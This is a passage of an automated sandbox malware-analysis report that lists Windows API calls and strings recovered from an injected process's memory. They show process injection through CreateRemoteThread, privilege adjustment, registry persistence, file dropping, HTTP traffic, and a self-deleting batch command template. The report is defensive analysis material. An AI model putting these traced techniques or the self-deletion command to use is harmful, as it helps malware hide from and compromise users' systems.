Part of subcall function 0063DD09: ReleaseDC.USER32(00000000,00000001), ref: 0063DF65

GetShellWindow.USER32 ref: 00637338
SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 0063736B

Part of subcall function 00648C40: PathCombineW.SHLWAPI(00641F45,00641F45,?), ref: 00648C5F

WaitForSingleObject.KERNEL32(00000000,00001388), ref: 006373CD
CloseHandle.KERNEL32(?), ref: 006373DD
CloseHandle.KERNEL32(?), ref: 006373E3
SystemParametersInfoW.USER32(00001003,00000000,00000000,00000000), ref: 006373F2

Part of subcall function 0063D4B4: WSAGetLastError.WS2_32(?,0000012C,00000000,00000031,00000020,00000010,0063E1F1,001B7740,?,00000003,001B7740,?,001B7740,?,00000000), ref: 0063D714
Part of subcall function 0063D4B4: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0063D72F
Part of subcall function 0063D4B4: ReleaseMutex.KERNEL32(00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 0063D7C1
Part of subcall function 0063D4B4: GetSystemMetrics.USER32(00000017), ref: 0063D8DB
Part of subcall function 0063D4B4: ReleaseMutex.KERNEL32(00000000,?,?,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 0063DC67

Part of subcall function 0063DF74: DeleteObject.GDI32(00000000), ref: 0063DF87
Part of subcall function 0063DF74: CloseHandle.KERNEL32(00000000), ref: 0063DF97
Part of subcall function 0063DF74: TlsFree.KERNEL32(00000000,00000000,00652868,00000000,0063E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0063DFA2
Part of subcall function 0063DF74: CloseHandle.KERNEL32(00000000), ref: 0063DFB0
Part of subcall function 0063DF74: UnmapViewOfFile.KERNEL32(00000000,00000000,00652868,00000000,0063E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0063DFBA
Part of subcall function 0063DF74: CloseHandle.KERNEL32(00000000), ref: 0063DFC7
Part of subcall function 0063DF74: SelectObject.GDI32(00000000,00000000), ref: 0063DFE1
Part of subcall function 0063DF74: DeleteObject.GDI32(00000000), ref: 0063DFF2
Part of subcall function 0063DF74: DeleteDC.GDI32(00000000), ref: 0063DFFF
Part of subcall function 0063DF74: CloseHandle.KERNEL32(00000000), ref: 0063E010
Part of subcall function 0063DF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0063E01F
Part of subcall function 0063DF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 0063E038

Part of subcall function 006465B7: recv.WS2_32(?,?,00000400,00000000), ref: 00646600
Part of subcall function 006465B7: #19.WS2_32(?,?,00000000,00000000), ref: 0064661A
Part of subcall function 006465B7: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00646657

Part of subcall function 0064675E: shutdown.WS2_32(?,00000002), ref: 00646766
Part of subcall function 0064675E: #3.WS2_32(?), ref: 0064676D

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Part of subcall function 006467B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 006467CC

Part of subcall function 00646774: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 006467A7

Part of subcall function 00646403: socket.WS2_32(?,00000001,00000006), ref: 0064640C
Part of subcall function 00646403: connect.WS2_32(00000000,?,-0000001D), ref: 0064642C
Part of subcall function 00646403: #3.WS2_32(00000000), ref: 00646437

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064A6AF, Relevance: 12.2, APIs: 8, Instructions: 165

APIs

Part of subcall function 0064A594: HttpQueryInfoA.WININET(?,0000002D,?,?,00000000), ref: 0064A5F4

Part of subcall function 00641049: EnterCriticalSection.KERNEL32(00652AC8), ref: 00641064
Part of subcall function 00641049: LeaveCriticalSection.KERNEL32(00652AC8), ref: 006410E7
Part of subcall function 00641049: InternetCrackUrlA.WININET(?,?,00000000,?), ref: 006411B2
Part of subcall function 00641049: InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 006413EC

SetLastError.KERNEL32(00002F78), ref: 0064A6F6
HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 0064A762
HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 0064A77E
HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 0064A795
EnterCriticalSection.KERNEL32(00653F24), ref: 0064A79D
LeaveCriticalSection.KERNEL32(00653F24,?), ref: 0064A853

Part of subcall function 00645048: InternetQueryOptionA.WININET(?,00000015,?,?), ref: 0064506A
Part of subcall function 00645048: InternetQueryOptionA.WININET(?,00000015,?,?), ref: 0064508C
Part of subcall function 00645048: InternetCloseHandle.WININET(?), ref: 00645094

Part of subcall function 00641C3C: CreateThread.KERNEL32(00000000,00000000,Function_00011A04,?,00000000,00000000), ref: 00641C81
Part of subcall function 00641C3C: CloseHandle.KERNEL32(?), ref: 00641C9A

EnterCriticalSection.KERNEL32(00653F24), ref: 0064A87A
LeaveCriticalSection.KERNEL32(00653F24,?), ref: 0064A8BA

Part of subcall function 00649C3C: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00653F24,0064A893,?), ref: 00649CB1

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 006431CC, Relevance: 12.1, APIs: 8, Instructions: 114

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006431ED
Process32FirstW.KERNEL32(000001E6,?), ref: 00643216

Part of subcall function 0064245B: CreateMutexW.KERNEL32(00652C30,00000001,?,00652E70,76C605D7,?,00000002,?,76C605D7), ref: 006424A3
Part of subcall function 0064245B: GetLastError.KERNEL32 ref: 006424AF
Part of subcall function 0064245B: CloseHandle.KERNEL32(00000000), ref: 006424BD

OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 00643271
CloseHandle.KERNEL32(?), ref: 0064330E

Part of subcall function 006449D2: OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,00642326,000000FF,00652C08,?,?,00000000), ref: 006449E2
Part of subcall function 006449D2: GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,00642326,000000FF,00652C08), ref: 00644A0E
Part of subcall function 006449D2: CloseHandle.KERNEL32(?), ref: 00644A23

CloseHandle.KERNEL32(00000000), ref: 0064328E
GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 006432A1

Part of subcall function 00643346: HeapAlloc.KERNEL32(00000008,-00000003,006436F5,?,?,00000000,006441E1,?,?,?,?,?,00644191,?,?,?), ref: 00643368
Part of subcall function 00643346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,006436F5,?,?,00000000,006441E1,?,?,?,?,?,00644191,?,?), ref: 00643379

Part of subcall function 00643048: OpenProcess.KERNEL32(0000047A,00000000,?,?,00000000), ref: 00643157
Part of subcall function 00643048: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-00C95903,00000000,00000000,00000000), ref: 00643185
Part of subcall function 00643048: WaitForSingleObject.KERNEL32(00000000,00002710), ref: 00643198
Part of subcall function 00643048: CloseHandle.KERNEL32(?), ref: 006431A1
Part of subcall function 00643048: VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,?,00000000), ref: 006431B5
Part of subcall function 00643048: CloseHandle.KERNEL32(00000000), ref: 006431BC

Process32NextW.KERNEL32(000001E6,0000022C), ref: 0064331A
CloseHandle.KERNEL32(000001E6), ref: 0064332B

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0063B11C, Relevance: 12.1, APIs: 8, Instructions: 107

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0063B130
ReleaseMutex.KERNEL32(?), ref: 0063B14F
GetWindowRect.USER32(?,?), ref: 0063B15C
IsRectEmpty.USER32(?), ref: 0063B1E0
GetWindowLongW.USER32(?,000000F0), ref: 0063B1EF
GetParent.USER32(?), ref: 0063B205
MapWindowPoints.USER32(00000000,00000000), ref: 0063B20E
SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 0063B232

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 006414C3, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 367

APIs

Part of subcall function 0064433F: CharLowerA.USER32(00000000), ref: 00644420
Part of subcall function 0064433F: CharLowerA.USER32(?), ref: 0064442D

Part of subcall function 00643346: HeapAlloc.KERNEL32(00000008,-00000003,006436F5,?,?,00000000,006441E1,?,?,?,?,?,00644191,?,?,?), ref: 00643368
Part of subcall function 00643346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,006436F5,?,?,00000000,006441E1,?,?,?,?,?,00644191,?,?), ref: 00643379

Part of subcall function 00647FE1: StrCmpNIA.SHLWAPI(00000001,nbsp;,00000005), ref: 00648104

Part of subcall function 0064338B: HeapAlloc.KERNEL32(00000008,-00000004,00644B59,00000000,?,?,?,00641E08,00000000,006422ED,?,?,00000000), ref: 0064339C

InternetCrackUrlA.WININET ref: 006417AC
GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 006417CA

Part of subcall function 006440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 006440CF

LeaveCriticalSection.KERNEL32(00652AC8,?,?), ref: 0064194D

Part of subcall function 00644660: CryptAcquireContextW.ADVAPI32(00648C87,00000000,00000000,00000001,F0000040,00000000,00648C87,?,00000030,?,?,?,006491A0,?), ref: 00644679
Part of subcall function 00644660: CryptCreateHash.ADVAPI32(00008003,00008003,00000000,00000000,?,?,?,006491A0,?), ref: 00644691
Part of subcall function 00644660: CryptHashData.ADVAPI32(?,00000010), ref: 006446AD
Part of subcall function 00644660: CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 006446C5
Part of subcall function 00644660: CryptDestroyHash.ADVAPI32(?), ref: 006446DC
Part of subcall function 00644660: CryptReleaseContext.ADVAPI32(?,00000000,?,?,006491A0,?), ref: 006446E6

GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 006418E4

Part of subcall function 0064763A: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,00649EAB,?,?,00000004), ref: 00647658
Part of subcall function 0064763A: RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,00649EAB,?,?,00649EAB,?,?,00000004,?,00000004), ref: 00647672
Part of subcall function 0064763A: RegCloseKey.ADVAPI32(00000004,?,?,00649EAB,?,?,00000004,?,00000004), ref: 00647681

EnterCriticalSection.KERNEL32(00652AC8), ref: 00641910

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Strings

?*, xrefs: 006414FD

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 006363F0, Relevance: 10.7, APIs: 7, Instructions: 216

APIs

Part of subcall function 00642507: CreateMutexW.KERNELBASE(00652C30,00000000,?,?,?,?,?), ref: 00642528

Part of subcall function 0064262D: WaitForSingleObject.KERNEL32(00000000,0063BB83), ref: 00642635

Part of subcall function 00635ECF: PathRemoveFileSpecW.SHLWAPI(C:\Users\admin\AppData\Roaming\Yfheor), ref: 00635F07
Part of subcall function 00635ECF: PathRenameExtensionW.SHLWAPI(00000000,.tmp), ref: 00635F23
Part of subcall function 00635ECF: GetFileAttributesW.KERNEL32(006523C8,C:\Users\admin\AppData\Roaming\Yfheor,C:\Users\admin\AppData\Roaming\Yfheor,00000000,00020000,006369C9,00000001,?,8793AEF2,00000002,00002723,00020000,00000000,00002722,00020000,?), ref: 00635F46

GetFileAttributesW.KERNEL32(?,00000000,?,00000000,00000330,?,?,00000102), ref: 00636538
GetFileAttributesW.KERNEL32(006523C8), ref: 0063654B
CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00636571
CloseHandle.KERNEL32(00000000), ref: 0063658F
lstrcmpiW.KERNEL32(?,?), ref: 006365BF
MoveFileExW.KERNEL32(?,?,0000000B), ref: 006365E7

Part of subcall function 00636BD7: RegOpenKeyExW.ADVAPI32(80000001,006527F0,00000000,00000001,?,?), ref: 00636C00

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Part of subcall function 00636010: GetTickCount.KERNEL32(0000271B,00020000,00000000,00002719,00020000,00000000,00000000,000000FF,00000000), ref: 0063610F
Part of subcall function 00636010: GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,00000000,000000FF,00000000), ref: 00636162
Part of subcall function 00636010: GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,000000FF,00000000), ref: 006361A4
Part of subcall function 00636010: GetUserNameExW.SECUR32(00000002,?,00000104), ref: 006361E6

Part of subcall function 0063680D: WaitForSingleObject.KERNEL32(?,00001388), ref: 0063685A
Part of subcall function 0063680D: Sleep.KERNEL32(00001388,?,?,?,00000000,?,?,-78D0C214,00000002), ref: 00636869

Part of subcall function 00649354: FlushFileBuffers.KERNEL32(00000000), ref: 00649360
Part of subcall function 00649354: CloseHandle.KERNEL32(?), ref: 00649368

Part of subcall function 00648716: SetFileAttributesW.KERNEL32(00000080,00000080,0064B4CD,?), ref: 0064871F
Part of subcall function 00648716: DeleteFileW.KERNEL32(?), ref: 00648729

Part of subcall function 006486EF: GetFileSizeEx.KERNEL32(0064925C,0064925C,?,?,?,0064925C,00000000), ref: 006486FB

WaitForSingleObject.KERNEL32(00007530,?), ref: 0063668B

Part of subcall function 00646B8E: ReleaseMutex.KERNEL32(00000000,00643021,?,?,?), ref: 00646B92

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064A298, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94

APIs

ResetEvent.KERNEL32(?), ref: 0064A2A6

Part of subcall function 0064338B: HeapAlloc.KERNEL32(00000008,-00000004,00644B59,00000000,?,?,?,00641E08,00000000,006422ED,?,?,00000000), ref: 0064339C

InternetSetStatusCallbackW.WININET(?,0064A24F), ref: 0064A2DB
InternetReadFileExA.WININET ref: 0064A31B
GetLastError.KERNEL32 ref: 0064A325

Part of subcall function 00646B28: TranslateMessage.USER32(?), ref: 00646B4A
Part of subcall function 00646B28: DispatchMessageW.USER32(?), ref: 00646B55
Part of subcall function 00646B28: PeekMessageW.USER32(00000000), ref: 00646B65
Part of subcall function 00646B28: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00646B79

InternetSetStatusCallbackW.WININET(?,?), ref: 0064A389

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Part of subcall function 00643346: HeapAlloc.KERNEL32(00000008,-00000003,006436F5,?,?,00000000,006441E1,?,?,?,?,?,00644191,?,?,?), ref: 00643368
Part of subcall function 00643346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,006436F5,?,?,00000000,006441E1,?,?,?,?,?,00644191,?,?), ref: 00643379

Strings

Zjdj2jnj<jFj, xrefs: 0064A31B

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00644E7B, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85

APIs

Part of subcall function 00648737: GetTempPathW.KERNEL32(000000F6,?), ref: 0064874E

CharToOemW.USER32(?,?), ref: 00644EAB
GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00644F2F

Part of subcall function 00648716: SetFileAttributesW.KERNEL32(00000080,00000080,0064B4CD,?), ref: 0064871F
Part of subcall function 00648716: DeleteFileW.KERNEL32(?), ref: 00648729

Part of subcall function 0064856B: CreateFileW.KERNEL32(00644E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00648585
Part of subcall function 0064856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 006485A8
Part of subcall function 0064856B: CloseHandle.KERNEL32(00000000), ref: 006485B5

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Part of subcall function 006440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 006440CF

Strings

/c "%s", xrefs: 00644F01
ComSpec, xrefs: 00644F2A
@echo off%sdel /F "%s", xrefs: 00644EBE
bat, xrefs: 00644E8B

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064795E, Relevance: 10.6, APIs: 7, Instructions: 65

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 0064797D
PathAddBackslashW.SHLWAPI(?), ref: 00647994
PathRemoveBackslashW.SHLWAPI(?), ref: 006479A5
PathRemoveFileSpecW.SHLWAPI(?), ref: 006479B2
PathAddBackslashW.SHLWAPI(?), ref: 006479C3
GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000064), ref: 006479D2
CLSIDFromString.OLE32(?,?), ref: 006479EC

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 006478D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60

APIs

RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 006478FD

Part of subcall function 0064773A: CharUpperW.USER32(00000000), ref: 0064785B

RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 0064792F
RegCloseKey.ADVAPI32(?), ref: 00647938
RegCloseKey.ADVAPI32(?), ref: 00647952

Strings

d, xrefs: 00647943
SOFTWARE\Microsoft, xrefs: 006478F0

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00644A87, Relevance: 10.6, APIs: 7, Instructions: 52

APIs

GetCurrentThread.KERNEL32(00000020,00000000,0064C9A1,00000000,?,?,?,?,0064C9A1,SeTcbPrivilege), ref: 00644A97
OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0064C9A1,SeTcbPrivilege), ref: 00644A9E
OpenProcessToken.ADVAPI32(000000FF,00000020,0064C9A1,?,?,?,?,0064C9A1,SeTcbPrivilege), ref: 00644AB0
LookupPrivilegeValueW.ADVAPI32(00000000,0064C9A1,?), ref: 00644AD4
AdjustTokenPrivileges.ADVAPI32(0064C9A1,00000000,00000001,00000000,00000000,00000000), ref: 00644AE9
GetLastError.KERNEL32 ref: 00644AF3
CloseHandle.KERNEL32(0064C9A1), ref: 00644B02

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00646A3C, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43

APIs

Part of subcall function 00644A87: GetCurrentThread.KERNEL32(00000020,00000000,0064C9A1,00000000,?,?,?,?,0064C9A1,SeTcbPrivilege), ref: 00644A97
Part of subcall function 00644A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0064C9A1,SeTcbPrivilege), ref: 00644A9E
Part of subcall function 00644A87: OpenProcessToken.ADVAPI32(000000FF,00000020,0064C9A1,?,?,?,?,0064C9A1,SeTcbPrivilege), ref: 00644AB0
Part of subcall function 00644A87: LookupPrivilegeValueW.ADVAPI32(00000000,0064C9A1,?), ref: 00644AD4
Part of subcall function 00644A87: AdjustTokenPrivileges.ADVAPI32(0064C9A1,00000000,00000001,00000000,00000000,00000000), ref: 00644AE9
Part of subcall function 00644A87: GetLastError.KERNEL32 ref: 00644AF3
Part of subcall function 00644A87: CloseHandle.KERNEL32(0064C9A1), ref: 00644B02

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 00646A5B
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000), ref: 00646A77
SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 00646A8E
LocalFree.KERNEL32(00000000), ref: 00646A9D

Strings

SeSecurityPrivilege, xrefs: 00646A43
S:(ML;CIOI;NRNWNX;;;LW), xrefs: 00646A56

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0063B31C, Relevance: 9.2, APIs: 6, Instructions: 197

APIs

GetAncestor.USER32(?,00000002), ref: 0063B345
SendMessageTimeoutW.USER32(?,00000021,?,?,00000002,00000064,?), ref: 0063B370
PostMessageW.USER32(?,00000020,?,00000000), ref: 0063B3B2

Part of subcall function 0063B23D: GetTickCount.KERNEL32 ref: 0063B2A3
Part of subcall function 0063B23D: GetClassLongW.USER32(?,000000E6), ref: 0063B2D8

GetWindowThreadProcessId.USER32(?,00000000), ref: 0063B448
PostMessageW.USER32(?,00000112,?,?), ref: 0063B49B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0063B4DA

Part of subcall function 0063B0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0063B0B3
Part of subcall function 0063B0AD: ReleaseMutex.KERNEL32(?), ref: 0063B0E7
Part of subcall function 0063B0AD: IsWindow.USER32(?), ref: 0063B0EE
Part of subcall function 0063B0AD: PostMessageW.USER32(?,00000215,00000000,?), ref: 0063B108
Part of subcall function 0063B0AD: SendMessageW.USER32(?,00000215,00000000,?), ref: 0063B110

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00639694, Relevance: 9.2, APIs: 6, Instructions: 175

APIs

Part of subcall function 00648C40: PathCombineW.SHLWAPI(00641F45,00641F45,?), ref: 00648C5F

Part of subcall function 0064338B: HeapAlloc.KERNEL32(00000008,-00000004,00644B59,00000000,?,?,?,00641E08,00000000,006422ED,?,?,00000000), ref: 0064339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00639709
StrStrIW.SHLWAPI(?,?), ref: 00639796
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 006397BE
GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 006397DB
GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 0063980C
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 0063982D

Part of subcall function 006440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 006440CF

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064A3B1, Relevance: 9.2, APIs: 6, Instructions: 153

APIs

EnterCriticalSection.KERNEL32(00653F24), ref: 0064A3C2
LeaveCriticalSection.KERNEL32(00653F24), ref: 0064A425

Part of subcall function 0064A298: ResetEvent.KERNEL32(?), ref: 0064A2A6
Part of subcall function 0064A298: InternetSetStatusCallbackW.WININET(?,0064A24F), ref: 0064A2DB
Part of subcall function 0064A298: InternetReadFileExA.WININET ref: 0064A31B
Part of subcall function 0064A298: GetLastError.KERNEL32 ref: 0064A325
Part of subcall function 0064A298: InternetSetStatusCallbackW.WININET(?,?), ref: 0064A389

EnterCriticalSection.KERNEL32(00653F24), ref: 0064A442
GetUrlCacheEntryInfoW.WININET(?,00000000,000000FF), ref: 0064A4C6

Part of subcall function 0064856B: CreateFileW.KERNEL32(00644E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00648585
Part of subcall function 0064856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 006485A8
Part of subcall function 0064856B: CloseHandle.KERNEL32(00000000), ref: 006485B5

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Part of subcall function 006454F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 00645505
Part of subcall function 006454F1: GetLastError.KERNEL32 ref: 0064550F
Part of subcall function 006454F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0064552F

Part of subcall function 006414C3: InternetCrackUrlA.WININET ref: 006417AC
Part of subcall function 006414C3: GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 006417CA
Part of subcall function 006414C3: GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 006418E4
Part of subcall function 006414C3: EnterCriticalSection.KERNEL32(00652AC8), ref: 00641910
Part of subcall function 006414C3: LeaveCriticalSection.KERNEL32(00652AC8,?,?), ref: 0064194D

Part of subcall function 0064338B: HeapAlloc.KERNEL32(00000008,-00000004,00644B59,00000000,?,?,?,00641E08,00000000,006422ED,?,?,00000000), ref: 0064339C

SetLastError.KERNEL32(00002EE4), ref: 0064A51C
LeaveCriticalSection.KERNEL32(00653F24), ref: 0064A585

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0063929D, Relevance: 9.1, APIs: 6, Instructions: 148

APIs

Part of subcall function 0064338B: HeapAlloc.KERNEL32(00000008,-00000004,00644B59,00000000,?,?,?,00641E08,00000000,006422ED,?,?,00000000), ref: 0064339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 006392D4
StrStrIW.SHLWAPI(?,?), ref: 0063935C
StrStrIW.SHLWAPI(?,?), ref: 0063936D
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00639389
GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 006393A7
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 006393C1

Part of subcall function 006440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 006440CF

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00641049, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 395

APIs

EnterCriticalSection.KERNEL32(00652AC8), ref: 00641064
LeaveCriticalSection.KERNEL32(00652AC8), ref: 006410E7
InternetCrackUrlA.WININET(?,?,00000000,?), ref: 006411B2

Part of subcall function 0064AE54: EnterCriticalSection.KERNEL32(00653FB4,?,006411CF,?), ref: 0064AE5B
Part of subcall function 0064AE54: LeaveCriticalSection.KERNEL32(00653FB4), ref: 0064AE90

Part of subcall function 0064AE9A: EnterCriticalSection.KERNEL32(00653FB4,?,00000000,006413AE,00000000), ref: 0064AEA6
Part of subcall function 0064AE9A: LeaveCriticalSection.KERNEL32(00653FB4), ref: 0064AEF1

InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 006413EC

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Part of subcall function 00640AA1: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00640C73
Part of subcall function 00640AA1: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00640C93
Part of subcall function 00640AA1: RegCloseKey.ADVAPI32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00640CA6
Part of subcall function 00640AA1: GetLocalTime.KERNEL32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00640CB5

Part of subcall function 00649B3E: CreateMutexW.KERNEL32(00652C30,00000000,00653F40,?,?,?,006379E5), ref: 00649B66

Strings

, xrefs: 00641301

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

